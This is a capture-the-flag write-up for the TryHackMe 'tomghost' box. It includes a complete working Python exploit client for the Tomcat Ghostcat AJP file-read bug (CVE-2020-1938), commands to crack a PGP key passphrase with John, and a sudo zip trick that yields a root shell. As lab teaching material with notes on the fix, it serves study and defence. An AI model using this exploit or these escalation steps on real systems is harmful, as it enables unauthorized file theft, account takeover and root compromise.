# TryHackMe - tomghost (Easy)

## Summary

Using Ghostcat (an arbitrary file read through Tomcat's AJP connector), we get a credential that gives us a low-privileged user shell over SSH. In that user's home directory we find a PGP-encrypted credential file and the matching PGP private key. We crack the passphrase protecting the private key with John, decrypt the file, and get a credential for a user with slightly higher privilege.

In the privilege escalation phase, `sudo -l` shows that we are able to run `/usr/bin/zip` as root. We easily get a root shell using a privesc payload from GTFOBins.

## IP

* RHOST: 10.10.65.87
* LHOST: 10.13.12.2

## Nmap

![Nmap](https://i.imgur.com/GPBCvSW.png)

## Ghostcat

The box name "tomghost" refers to "Ghostcat" (CVE-2020-1938), the Apache Tomcat AJP connector vulnerability reported by Chaitin Tech. The AJP connector (port 8009 by default) trusts request attributes supplied by the client, so anyone who can reach that port can make Tomcat read arbitrary files under the web application root, `WEB-INF/web.xml` included, and, if they can also upload a file into the webapp, have it processed as JSP. The fix (Tomcat 9.0.31, 8.5.51 and 7.0.100) is to ship with the AJP connector disabled, bind it to localhost and require a shared `secret`:

<https://www.chaitin.cn/en/ghostcat>
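
To make clear what the Metasploit module is doing on the wire, here is an added example (written for this writeup; it is neither the page author's code nor the Metasploit module) of a minimal AJP13 client: it builds the Ghostcat forward request, whose `javax.servlet.include.*` request attributes make Tomcat's DefaultServlet serve a file under the webapp root, and decodes the container's reply. It assumes the AJP connector is on RHOST 10.10.65.87 port 8009 (the default AJP port) and that `WEB-INF/web.xml` is the file to read; both are assumptions, not details taken from the page. The reply used to exercise the parser is constructed, not captured from the box.

```python
"""Minimal AJP13 client for Ghostcat (CVE-2020-1938). Added example; assumes
AJP on 10.10.65.87:8009 (default port) and WEB-INF/web.xml as the target."""
import socket
import struct

AJP_MAGIC_REQ = b"\x12\x34"    # client -> container packets
AJP_MAGIC_RESP = b"AB"         # container -> client packets
FORWARD_REQUEST, METHOD_GET = 2, 2
ATTR_REQ_ATTRIBUTE, ATTR_DONE = 0x0A, 0xFF
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 3, 4, 5
# Response header names Tomcat sends as 2-byte codes instead of strings.
RESP_HEADER_NAMES = {
    0xA001: "Content-Type", 0xA002: "Content-Language", 0xA003: "Content-Length",
    0xA004: "Date", 0xA005: "Last-Modified", 0xA006: "Location",
    0xA007: "Set-Cookie", 0xA008: "Set-Cookie2", 0xA009: "Servlet-Engine",
    0xA00A: "Status", 0xA00B: "WWW-Authenticate",
}


def ajp_string(s):
    """AJP string: 2-byte length, bytes, NUL; None is the 0xFFFF null string."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def ajp_int(n):
    return struct.pack(">H", n)


def build_ghostcat_request(path, server_name, req_uri="/asdf", server_port=8080):
    """FORWARD_REQUEST whose javax.servlet.include.* attributes make the
    DefaultServlet serve `path` (relative to the webapp root) instead of
    req_uri. Trusting these client-supplied attributes is the Ghostcat bug."""
    headers = {"Host": server_name, "Accept": "*/*"}
    attrs = {
        "javax.servlet.include.request_uri": "/",
        "javax.servlet.include.path_info": path,
        "javax.servlet.include.servlet_path": "/",
    }
    p = bytes([FORWARD_REQUEST, METHOD_GET])
    p += ajp_string("HTTP/1.1") + ajp_string(req_uri)
    p += ajp_string("127.0.0.1") + ajp_string(None)      # remote_addr, remote_host
    p += ajp_string(server_name) + ajp_int(server_port)
    p += b"\x00"                                         # is_ssl = false
    p += ajp_int(len(headers))
    for name, value in headers.items():                  # plain-string header names
        p += ajp_string(name) + ajp_string(value)
    for name, value in attrs.items():
        p += bytes([ATTR_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    p += bytes([ATTR_DONE])
    if len(p) + 4 > 8192:
        raise ValueError("AJP packets are limited to 8 KiB")
    return AJP_MAGIC_REQ + ajp_int(len(p)) + p


def _read_string(buf, off):
    n = struct.unpack_from(">H", buf, off)[0]
    if n == 0xFFFF:
        return None, off + 2
    return buf[off + 2:off + 2 + n].decode(errors="replace"), off + 3 + n


def parse_ajp_response(data):
    """Walk the container's packets; return (http_status, headers, body)."""
    status, headers, body, off = None, {}, b"", 0
    while off + 4 <= len(data):
        if data[off:off + 2] != AJP_MAGIC_RESP:
            raise ValueError("bad AJP response magic at offset %d" % off)
        length = struct.unpack_from(">H", data, off + 2)[0]
        pkt = data[off + 4:off + 4 + length]
        off += 4 + length
        code = pkt[0]
        if code == SEND_HEADERS:
            status = struct.unpack_from(">H", pkt, 1)[0]
            _msg, p = _read_string(pkt, 3)
            nhdr = struct.unpack_from(">H", pkt, p)[0]
            p += 2
            for _ in range(nhdr):
                if pkt[p] == 0xA0:                       # coded header name
                    name = RESP_HEADER_NAMES.get(struct.unpack_from(">H", pkt, p)[0], "?")
                    p += 2
                else:
                    name, p = _read_string(pkt, p)
                value, p = _read_string(pkt, p)
                headers[name] = value
        elif code == SEND_BODY_CHUNK:
            n = struct.unpack_from(">H", pkt, 1)[0]
            body += pkt[3:3 + n]
        elif code == END_RESPONSE:
            break
    return status, headers, body


def sample_response(body=b"<web-app>\n  <!-- constructed sample, not the box's file -->\n</web-app>\n"):
    """Constructed container reply (not captured) used to exercise the parser offline."""
    hdr = bytes([SEND_HEADERS]) + ajp_int(200) + ajp_string("OK") + ajp_int(1)
    hdr += b"\xa0\x01" + ajp_string("text/xml")           # coded Content-Type header
    chunk = bytes([SEND_BODY_CHUNK]) + ajp_int(len(body)) + body + b"\x00"
    end = bytes([END_RESPONSE, 0x01])                     # reuse flag
    return b"".join(AJP_MAGIC_RESP + ajp_int(len(p)) + p for p in (hdr, chunk, end))


def fetch_via_ajp(host, port, path, timeout=5):
    """Send the request to a live AJP connector and parse what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_ghostcat_request(path, host))
        data = b""
        try:
            while True:
                chunk = s.recv(8192)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass                                          # Tomcat may keep the socket open
    return parse_ajp_response(data)


if __name__ == "__main__":
    status, headers, body = fetch_via_ajp("10.10.65.87", 8009, "WEB-INF/web.xml")
    print(status, headers)
    print(body.decode(errors="replace"))
```

Run it against the box to see the same file the Metasploit module retrieves; the offline pieces (`build_ghostcat_request`, `parse_ajp_response`, `sample_response`) need no target. Everything in the forward request except the three include attributes is ordinary AJP, which is why the only real defence is not exposing the connector, or requiring a `secret` the client cannot supply.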

## User Shell: Ghostcat

Search the keyword "ghostcat" in Metasploit:

![search](https://i.imgur.com/greljGv.png)

Run the module against RHOST (it is an auxiliary file-read module, not a code-execution exploit) and read the retrieved file; it contains a credential:

![Ghostcat](https://i.imgur.com/urVtHKl.png)

The credential is `skyfuck:8730281lkjlkjdqlksalks`. SSH in to get a user shell:

![User shell](https://i.imgur.com/sNKXwtn.png)

## Lateral Movement: GPG Password Cracking

There are two files in the home directory:

![Home directory](https://i.imgur.com/3Z5ZfiO.png)

Download both files to our attack machine with SCP:

```bash
# tomghost.thm is RHOST (10.10.65.87); add it to /etc/hosts if it does not resolve.
# The escaped braces are expanded by the remote shell, so both files come over in one session.
scp skyfuck@tomghost.thm:\{credential.pgp,tryhackme.asc\} .
# password = 8730281lkjlkjdqlksalks
```

The idea is to import the PGP private key `tryhackme.asc` and then decrypt the PGP message `credential.pgp` with it. However, the private key is itself protected, so importing it prompts for a passphrase:

![Password required](https://i.imgur.com/AWQF2Yg.png)

We want to crack that passphrase with John. Convert the ASCII-armored private key into John's hash format:

```bash
gpg2john tryhackme.asc > hash.txt
```

Crack it with rockyou:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt   # print the recovered passphrase
```

The password is `alexandru`:

![alexandru](https://i.imgur.com/kapiHrv.png)

Import `tryhackme.asc` and decrypt `credential.pgp`:

![Decrypted](https://i.imgur.com/edrnwnR.png)

Here we get a credential `merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j`. SSH in as `merlin`:

![Merlin](https://i.imgur.com/NWVeTFg.png)

## Privilege Escalation: Sudo `zip`

`sudo -l`:

![sudo -l](https://i.imgur.com/4b3eVc7.png)

Grab the privesc payload for `zip` from GTFOBins (<https://gtfobins.github.io/gtfobins/zip/>):

![GTFOBins](https://i.imgur.com/WoFKrjt.png)

The trick is zip's `-T` flag, which tests the finished archive, combined with `-TT`, which sets the command used for that test. Under `sudo` that test command runs as root, so pointing it at `sh` spawns a root shell. Follow the instructions and spawn it:

![root shell](https://i.imgur.com/Qxci792.png)

